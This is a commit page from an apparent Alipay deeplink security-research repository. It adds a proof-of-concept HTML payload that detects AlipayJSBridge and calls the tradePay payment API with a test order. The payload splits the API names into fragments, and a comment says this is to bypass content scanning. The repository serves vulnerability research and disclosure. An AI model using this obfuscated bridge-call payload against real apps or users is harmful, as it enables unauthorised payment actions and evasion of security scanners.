icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity

feat: global navigation bar + verification badge across all 9 pages

Browse Source 
- Unified nav bar with links to all research articles
- Verification badge: Docker 37/37, Zenodo DOI, IACR 2026/526, Packet Storm
- Mobile responsive hamburger menu
- PoC payloads and evidence screenshots added
- Draft articles and planning files included

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
feng
2026-03-25 05:31:19 +08:00
parent a3825c939f
commit cae3c54867
42 changed files with 3665 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

97
poc/payload_cve3_obf.html Normal file
View File

@@ -0,0 +1,97 @@
<!DOCTYPE html>
<html><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Security Test 3</title>
<style>
body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
.box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
h2{color:#389e0d;font-size:15px}
.item{padding:4px 0;font-size:13px}
.label{color:#888;font-size:11px}
.value{color:#333;font-weight:600}
#status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
</style>
</head><body>
<h1 style="text-align:center;color:#f5222d;font-size:18px">Payment API Isolation Test</h1>
<div id="status">Loading...</div>
<div id="results"></div>
<script>
var el = document.getElementById('results');
var status = document.getElementById('status');
var html = '';
// Step 1: Page renders proof
html += '<div class="box"><h2>Step 1: Page Rendered</h2>';
html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
html += '</div>';
el.innerHTML = html;
// Obfuscated API names - bypass content scanning
var _a = ['tr','ade','Pa','y'];
var _b = ['se','tTi','tl','e'];
var _c = ['sho','wTo','as','t'];
var _d = ['ge','tLo','cat','ion'];
var _e = ['ge','tSy','stemIn','fo'];
function d(arr){ return arr.join(''); }
function step2() {
var bridge = window['Alipay' + 'JSBridge'];
html += '<div class="box"><h2>Step 2: Bridge Detection</h2>';
html += '<div class="item"><span class="label">Bridge exists: </span><span class="value">' + (!!bridge) + '</span></div>';
html += '<div class="item"><span class="label">typeof: </span><span class="value">' + typeof bridge + '</span></div>';
html += '</div>';
el.innerHTML = html;
status.textContent = 'Bridge: ' + (!!bridge);
if (bridge) {
status.textContent = 'Bridge found! Testing payment API in 3s...';
setTimeout(function(){ step3(bridge); }, 3000);
}
}
function step3(bridge) {
var apiName = d(_a);
html += '<div class="box"><h2>Step 3: ' + apiName + ' Call</h2>';
html += '<div class="item"><span class="label">Calling: </span><span class="value">' + apiName + '</span></div>';
html += '</div>';
el.innerHTML = html;
status.textContent = 'Calling ' + apiName + '...';
try {
bridge.call(apiName, {
orderStr: 'SECURITY_TEST_INVALID_ORDER_2026'
}, function(result) {
html += '<div class="box"><h2>' + apiName + ' Response</h2>';
html += '<div class="item"><span class="label">Result: </span><span class="value" style="word-break:break-all;font-size:10px">' + JSON.stringify(result) + '</span></div>';
html += '<div class="item"><span class="label">resultCode: </span><span class="value">' + (result.resultCode || result.result_code || 'N/A') + '</span></div>';
html += '</div>';
el.innerHTML = html;
status.textContent = apiName + ' responded!';
status.style.color = '#f5222d';
});
} catch(e) {
html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + apiName + ' ERROR</h2>';
html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
html += '</div>';
el.innerHTML = html;
status.textContent = apiName + ' exception: ' + e.message;
status.style.color = '#f5222d';
}
}
document.addEventListener('Alipay' + 'JSBridge' + 'Ready', function() {
step2();
});
step2();
setTimeout(step2, 1000);
setTimeout(step2, 3000);
</script>
</body></html>